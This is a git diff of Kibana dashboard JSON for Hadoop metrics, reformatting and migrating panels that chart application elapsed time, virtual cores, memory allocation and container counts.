"layers": [ - { - "accessors": [ - "b1201382-d991-47f1-9466-b0a4231edf29" - ], - "layerId": "c0d13a02-cbb4-496c-88bd-6187253ec8d8", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "xAccessor": "71dbc991-2911-4abe-b977-4dda3d9d5bb0", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "b1201382-d991-47f1-9466-b0a4231edf29" - } - ] - } - ], - "legend": { - "isVisible": 
true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "bar_horizontal", - "title": "Empty XY chart", - "valueLabels": "hide" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 24, + "i": "21b49c8e-4de0-4e5f-bd72-89f3dc794af1", + "w": 18, + "x": 0, + "y": 0 + }, + "panelIndex": "21b49c8e-4de0-4e5f-bd72-89f3dc794af1", + "title": "Elapsed time of different applications [Metrics Hadoop]", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-358c9e71-f4a3-4980-adec-21e72950e734", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "358c9e71-f4a3-4980-adec-21e72950e734": { + "columnOrder": [ + "d03524e9-64ac-4ac9-87e9-680f408594b7" + ], + "columns": { + "d03524e9-64ac-4ac9-87e9-680f408594b7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Average Elapsed Time", + "operationType": "average", + "params": { + "emptyAsNull": true, + "format": { + "id": "duration", + "params": { + "decimals": 0, + "fromUnit": "milliseconds" + } } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "8b49723a-7ec3-4b6a-8b5f-879f2dd4f5b0", - "w": 22, - "x": 26, - "y": 0 - }, - "panelIndex": "8b49723a-7ec3-4b6a-8b5f-879f2dd4f5b0", - "title": "Number of Virtual Cores Allocated [Metrics Hadoop]", - "type": "lens", - "version": "8.10.2" + }, + "scale": "ratio", + "sourceField": "hadoop.application.time.elapsed" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": 
"d03524e9-64ac-4ac9-87e9-680f408594b7", + "layerId": "358c9e71-f4a3-4980-adec-21e72950e734", + "layerType": "data", + "size": "m", + "textAlign": "center", + "titlePosition": "bottom" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-3003026c-64e9-4a34-9256-5500fb1a618a", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "3003026c-64e9-4a34-9256-5500fb1a618a": { - "columnOrder": [ - "a72c3684-ca50-4a1e-bae7-328ae098c42d" - ], - "columns": { - "a72c3684-ca50-4a1e-bae7-328ae098c42d": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Max Virtual Cores Allocated", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "hadoop.application.allocated.v_cores" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 8, + "i": "9fed89bd-d709-4c4a-a84a-93b4d805940a", + "w": 8, + "x": 18, + "y": 0 + }, + "panelIndex": "9fed89bd-d709-4c4a-a84a-93b4d805940a", + "title": "Average elapsed time [Metrics Hadoop]", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c0d13a02-cbb4-496c-88bd-6187253ec8d8", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "c0d13a02-cbb4-496c-88bd-6187253ec8d8": { + "columnOrder": [ + "71dbc991-2911-4abe-b977-4dda3d9d5bb0", + "b1201382-d991-47f1-9466-b0a4231edf29" + ], + "columns": { + "71dbc991-2911-4abe-b977-4dda3d9d5bb0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Application Id", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": 
"b1201382-d991-47f1-9466-b0a4231edf29", + "type": "column" }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "accessor": "a72c3684-ca50-4a1e-bae7-328ae098c42d", - "layerId": "3003026c-64e9-4a34-9256-5500fb1a618a", - "layerType": "data", - "size": "m", - "textAlign": "center", - "titlePosition": "bottom" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "hadoop.application.id" }, - "title": "", - "type": "lens", - "visualizationType": "lnsLegacyMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "b1201382-d991-47f1-9466-b0a4231edf29": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Number of Virtual Cores", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "hadoop.application.vcore_seconds" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 8, - "i": "3a5fad55-3e58-4326-8dbb-a71291fad652", - "w": 8, - "x": 18, - "y": 8 + "layers": [ + { + "accessors": [ + "b1201382-d991-47f1-9466-b0a4231edf29" + ], + "layerId": "c0d13a02-cbb4-496c-88bd-6187253ec8d8", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "xAccessor": "71dbc991-2911-4abe-b977-4dda3d9d5bb0", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "b1201382-d991-47f1-9466-b0a4231edf29" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true }, - "panelIndex": "3a5fad55-3e58-4326-8dbb-a71291fad652", - "title": "Maximum virtual cores allocated to the application's running containers [Metrics Hadoop]", - "type": "lens", - "version": "8.10.2" + "preferredSeriesType": 
"bar_horizontal", + "title": "Empty XY chart", + "valueLabels": "hide" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-f39f3706-d2c4-42a9-80dc-d5db38283fd0", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "f39f3706-d2c4-42a9-80dc-d5db38283fd0": { - "columnOrder": [ - "d46b83b5-6fd9-4b12-82bc-ab59592531e8", - "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d" - ], - "columns": { - "d46b83b5-6fd9-4b12-82bc-ab59592531e8": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Application Id", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "hadoop.application.id" - }, - "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Amount of Memory (MB)", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "hadoop.application.memory_seconds" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d" - ], - "layerId": "f39f3706-d2c4-42a9-80dc-d5db38283fd0", - "layerType": "data", - "position": "top", - "seriesType": "bar_horizontal", - "showGridlines": false, - "xAccessor": "d46b83b5-6fd9-4b12-82bc-ab59592531e8", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - 
"showSingleSeries": true - }, - "preferredSeriesType": "bar_horizontal", - "title": "Empty XY chart", - "valueLabels": "hide" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "ba4756f0-4674-4b0a-880d-54a5cfb4cb3f", - "w": 22, - "x": 26, - "y": 12 - }, - "panelIndex": "ba4756f0-4674-4b0a-880d-54a5cfb4cb3f", - "title": "Amount of Memory Allocated [Metrics Hadoop]", - "type": "lens", - "version": "8.10.2" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 12, + "i": "8b49723a-7ec3-4b6a-8b5f-879f2dd4f5b0", + "w": 22, + "x": 26, + "y": 0 + }, + "panelIndex": "8b49723a-7ec3-4b6a-8b5f-879f2dd4f5b0", + "title": "Number of Virtual Cores Allocated [Metrics Hadoop]", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-3003026c-64e9-4a34-9256-5500fb1a618a", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "3003026c-64e9-4a34-9256-5500fb1a618a": { + "columnOrder": [ + "a72c3684-ca50-4a1e-bae7-328ae098c42d" + ], + "columns": { + "a72c3684-ca50-4a1e-bae7-328ae098c42d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Max Virtual Cores Allocated", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "hadoop.application.allocated.v_cores" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "a72c3684-ca50-4a1e-bae7-328ae098c42d", + "layerId": "3003026c-64e9-4a34-9256-5500fb1a618a", + "layerType": "data", + "size": "m", + "textAlign": "center", + "titlePosition": "bottom" + } }, - { - "embeddableConfig": { - 
"attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "formBased": { - "layers": { - "f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5": { - "columnOrder": [ - "bc8b4d8b-6378-4cd6-bb0c-5b5af84de1b6" - ], - "columns": { - "bc8b4d8b-6378-4cd6-bb0c-5b5af84de1b6": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Max Allocated Memory (MB)", - "operationType": "max", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "hadoop.application.allocated.mb" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true + }, + "gridData": { + "h": 8, + "i": "3a5fad55-3e58-4326-8dbb-a71291fad652", + "w": 8, + "x": 18, + "y": 8 + }, + "panelIndex": "3a5fad55-3e58-4326-8dbb-a71291fad652", + "title": "Maximum virtual cores allocated to the application's running containers [Metrics Hadoop]", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f39f3706-d2c4-42a9-80dc-d5db38283fd0", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "f39f3706-d2c4-42a9-80dc-d5db38283fd0": { + "columnOrder": [ + "d46b83b5-6fd9-4b12-82bc-ab59592531e8", + "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d" + ], + "columns": { + "d46b83b5-6fd9-4b12-82bc-ab59592531e8": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Application Id", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d", + "type": "column" }, - "filters": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": true, 
+ "parentFormat": { + "id": "terms" }, - "visualization": { - "accessor": "bc8b4d8b-6378-4cd6-bb0c-5b5af84de1b6", - "layerId": "f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5", - "layerType": "data", - "size": "m", - "textAlign": "center", - "titlePosition": "bottom" - } + "size": 5 + }, + "scale": "ordinal", + "sourceField": "hadoop.application.id" }, - "title": "", - "type": "lens", - "visualizationType": "lnsLegacyMetric" - }, - "enhancements": {}, - "hidePanelTitles": true + "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Amount of Memory (MB)", + "operationType": "max", + "params": { + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "hadoop.application.memory_seconds" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 8, - "i": "c9df8dfd-25c1-4cea-9b59-71bb227c1826", - "w": 8, - "x": 18, - "y": 16 + "layers": [ + { + "accessors": [ + "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d" + ], + "layerId": "f39f3706-d2c4-42a9-80dc-d5db38283fd0", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal", + "showGridlines": false, + "xAccessor": "d46b83b5-6fd9-4b12-82bc-ab59592531e8", + "yConfig": [ + { + "axisMode": "left", + "forAccessor": "e63c81f6-6fa0-4c42-a1fc-d81a5daa0c6d" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true }, - "panelIndex": "c9df8dfd-25c1-4cea-9b59-71bb227c1826", - "title": "Maximum memory allocated to the application's running containers [Metrics Hadoop]", - "type": "lens", - "version": "8.10.2" - } - ], - "timeRestore": false, - "title": "[Metrics Hadoop] Applications", - "version": 1 - }, - "coreMigrationVersion": "8.8.0", - "created_at": "2023-10-10T08:25:28.388Z", - "id": 
"hadoop-3e16f2c0-cd28-11ec-be30-1d9331f0b107", - "managed": false, - "references": [ - { - "id": "logs-*", - "name": "21b49c8e-4de0-4e5f-bd72-89f3dc794af1:indexpattern-datasource-layer-dcf6a578-de72-4570-9fd8-f157f6494eb8", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "9fed89bd-d709-4c4a-a84a-93b4d805940a:indexpattern-datasource-layer-358c9e71-f4a3-4980-adec-21e72950e734", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "8b49723a-7ec3-4b6a-8b5f-879f2dd4f5b0:indexpattern-datasource-layer-c0d13a02-cbb4-496c-88bd-6187253ec8d8", - "type": "index-pattern" + "preferredSeriesType": "bar_horizontal", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false }, - { - "id": "logs-*", - "name": "3a5fad55-3e58-4326-8dbb-a71291fad652:indexpattern-datasource-layer-3003026c-64e9-4a34-9256-5500fb1a618a", - "type": "index-pattern" + "gridData": { + "h": 12, + "i": "ba4756f0-4674-4b0a-880d-54a5cfb4cb3f", + "w": 22, + "x": 26, + "y": 12 }, - { - "id": "logs-*", - "name": "ba4756f0-4674-4b0a-880d-54a5cfb4cb3f:indexpattern-datasource-layer-f39f3706-d2c4-42a9-80dc-d5db38283fd0", - "type": "index-pattern" + "panelIndex": "ba4756f0-4674-4b0a-880d-54a5cfb4cb3f", + "title": "Amount of Memory Allocated [Metrics Hadoop]", + "type": "lens", + "version": "8.10.2" + }, + { + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5": { + "columnOrder": [ + "bc8b4d8b-6378-4cd6-bb0c-5b5af84de1b6" + ], + "columns": { + "bc8b4d8b-6378-4cd6-bb0c-5b5af84de1b6": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Max Allocated Memory (MB)", + "operationType": "max", + "params": 
{ + "emptyAsNull": true + }, + "scale": "ratio", + "sourceField": "hadoop.application.allocated.mb" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "bc8b4d8b-6378-4cd6-bb0c-5b5af84de1b6", + "layerId": "f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5", + "layerType": "data", + "size": "m", + "textAlign": "center", + "titlePosition": "bottom" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true }, - { - "id": "logs-*", - "name": "c9df8dfd-25c1-4cea-9b59-71bb227c1826:indexpattern-datasource-layer-f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5", - "type": "index-pattern" + "gridData": { + "h": 8, + "i": "c9df8dfd-25c1-4cea-9b59-71bb227c1826", + "w": 8, + "x": 18, + "y": 16 }, - { - "id": "logs-*", - "name": "controlGroup_6df7972b-25f0-453b-829b-c183cddbc2f8:optionsListDataView", - "type": "index-pattern" - } + "panelIndex": "c9df8dfd-25c1-4cea-9b59-71bb227c1826", + "title": "Maximum memory allocated to the application's running containers [Metrics Hadoop]", + "type": "lens", + "version": "8.10.2" + } ], - "type": "dashboard", - "typeMigrationVersion": "8.9.0" + "timeRestore": false, + "title": "[Metrics Hadoop] Applications", + "version": 1 + }, + "references": [ + { + "id": "logs-*", + "name": "21b49c8e-4de0-4e5f-bd72-89f3dc794af1:indexpattern-datasource-layer-dcf6a578-de72-4570-9fd8-f157f6494eb8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9fed89bd-d709-4c4a-a84a-93b4d805940a:indexpattern-datasource-layer-358c9e71-f4a3-4980-adec-21e72950e734", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "8b49723a-7ec3-4b6a-8b5f-879f2dd4f5b0:indexpattern-datasource-layer-c0d13a02-cbb4-496c-88bd-6187253ec8d8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "3a5fad55-3e58-4326-8dbb-a71291fad652:indexpattern-datasource-layer-3003026c-64e9-4a34-9256-5500fb1a618a", 
+ "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ba4756f0-4674-4b0a-880d-54a5cfb4cb3f:indexpattern-datasource-layer-f39f3706-d2c4-42a9-80dc-d5db38283fd0", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "c9df8dfd-25c1-4cea-9b59-71bb227c1826:indexpattern-datasource-layer-f61f08d8-b1cc-4c7d-9cba-6b32820ce5d5", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_6df7972b-25f0-453b-829b-c183cddbc2f8:optionsListDataView", + "type": "index-pattern" + } + ], + "managed": false } \ No newline at end of file diff --git a/packages/hadoop/kibana/dashboard/hadoop-70125ec0-cf78-11ec-bc3e-6faca2b11df2.json b/packages/hadoop/kibana/dashboard/hadoop-70125ec0-cf78-11ec-bc3e-6faca2b11df2.json index 536969ae50f..df069f04758 100644 --- a/packages/hadoop/kibana/dashboard/hadoop-70125ec0-cf78-11ec-bc3e-6faca2b11df2.json +++ b/packages/hadoop/kibana/dashboard/hadoop-70125ec0-cf78-11ec-bc3e-6faca2b11df2.json 
@@ -1,562 +1,573 @@ { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true + "id": "hadoop-70125ec0-cf78-11ec-bc3e-6faca2b11df2", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T17:16:59.199Z", + "created_at": "2023-11-07T17:16:59.199Z", + "version": "WzEwMCwxXQ==", + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 20, + "i": "de277d30-051b-4343-b67b-b6b243c140f2", + "w": 27, + "x": 0, + "y": 0 }, - "panelsJSON": [ - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-b8ee20df-453e-488f-806e-6f4079a76be6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "50203b57-c1ac-4ab0-82eb-c7ca168bb650", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9b40dc83-210d-44d7-bbe3-549fbcdb09cb", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6c5f4d9b-3a70-4c21-a292-32654686b081", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "b8ee20df-453e-488f-806e-6f4079a76be6": { - "columnOrder": [ - "36dd81fa-f21e-4abd-b930-ad133b3feb10", - "927733e5-8d32-42b5-8b05-e27fb1e2adfc", - "4b6e5372-3e5e-4650-9b95-d6b81250436a", - "331edd36-c03b-4cc5-ba1b-8844d0381903" - ], - "columns": { - 
"331edd36-c03b-4cc5-ba1b-8844d0381903": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.node_manager.containers.failed: *" - }, - "isBucketed": false, - "label": "Failed", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.node_manager.containers.failed" - }, - "36dd81fa-f21e-4abd-b930-ad133b3feb10": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": false, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "4b6e5372-3e5e-4650-9b95-d6b81250436a": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.node_manager.containers.completed: *" - }, - "isBucketed": false, - "label": "Completed", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.node_manager.containers.completed" - }, - "927733e5-8d32-42b5-8b05-e27fb1e2adfc": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "hadoop.node_manager.containers.running: *" - }, - "isBucketed": false, - "label": "Running", - "operationType": "last_value", - "params": { - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "hadoop.node_manager.containers.running" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "50203b57-c1ac-4ab0-82eb-c7ca168bb650", - "key": "hadoop.node_manager.containers.running", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.node_manager.containers.running" - } 
- } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "9b40dc83-210d-44d7-bbe3-549fbcdb09cb", - "key": "hadoop.node_manager.containers.completed", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.node_manager.containers.completed" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "6c5f4d9b-3a70-4c21-a292-32654686b081", - "key": "hadoop.node_manager.containers.failed", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "hadoop.node_manager.containers.failed" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "927733e5-8d32-42b5-8b05-e27fb1e2adfc", - "4b6e5372-3e5e-4650-9b95-d6b81250436a", - "331edd36-c03b-4cc5-ba1b-8844d0381903" - ], - "layerId": "b8ee20df-453e-488f-806e-6f4079a76be6", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "xAccessor": "36dd81fa-f21e-4abd-b930-ad133b3feb10", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "927733e5-8d32-42b5-8b05-e27fb1e2adfc" - }, - { - "axisMode": "left", - "forAccessor": "4b6e5372-3e5e-4650-9b95-d6b81250436a" - }, - { - "axisMode": "left", - "forAccessor": "331edd36-c03b-4cc5-ba1b-8844d0381903" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "Timestamp", - "yTitle": "Containers" - } + "panelIndex": "de277d30-051b-4343-b67b-b6b243c140f2", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", 
+ "name": "indexpattern-datasource-layer-b8ee20df-453e-488f-806e-6f4079a76be6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "50203b57-c1ac-4ab0-82eb-c7ca168bb650", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "9b40dc83-210d-44d7-bbe3-549fbcdb09cb", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6c5f4d9b-3a70-4c21-a292-32654686b081", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "b8ee20df-453e-488f-806e-6f4079a76be6": { + "columnOrder": [ + "36dd81fa-f21e-4abd-b930-ad133b3feb10", + "927733e5-8d32-42b5-8b05-e27fb1e2adfc", + "4b6e5372-3e5e-4650-9b95-d6b81250436a", + "331edd36-c03b-4cc5-ba1b-8844d0381903" + ], + "columns": { + "331edd36-c03b-4cc5-ba1b-8844d0381903": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.node_manager.containers.failed: *" + }, + "isBucketed": false, + "label": "Failed", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.node_manager.containers.failed" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + "36dd81fa-f21e-4abd-b930-ad133b3feb10": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "4b6e5372-3e5e-4650-9b95-d6b81250436a": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.node_manager.containers.completed: *" + }, + "isBucketed": false, + "label": "Completed", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": 
"hadoop.node_manager.containers.completed" + }, + "927733e5-8d32-42b5-8b05-e27fb1e2adfc": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "hadoop.node_manager.containers.running: *" + }, + "isBucketed": false, + "label": "Running", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "hadoop.node_manager.containers.running" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "50203b57-c1ac-4ab0-82eb-c7ca168bb650", + "key": "hadoop.node_manager.containers.running", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.node_manager.containers.running" + } + } }, - "gridData": { - "h": 20, - "i": "de277d30-051b-4343-b67b-b6b243c140f2", - "w": 27, - "x": 0, - "y": 0 + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "9b40dc83-210d-44d7-bbe3-549fbcdb09cb", + "key": "hadoop.node_manager.containers.completed", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "hadoop.node_manager.containers.completed" + } + } }, - "panelIndex": "de277d30-051b-4343-b67b-b6b243c140f2", - "title": "Number of containers over time [Metrics Hadoop]", - "type": "lens", - "version": "8.3.0" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-ee8bbb4c-7f64-46b1-965b-daec27ad4251", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d73deed1-d0bd-4f83-8759-602565e70486", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "ee8bbb4c-7f64-46b1-965b-daec27ad4251": { - "columnOrder": [ - "49bd7898-d477-456f-bebd-db0024ea1510", - 
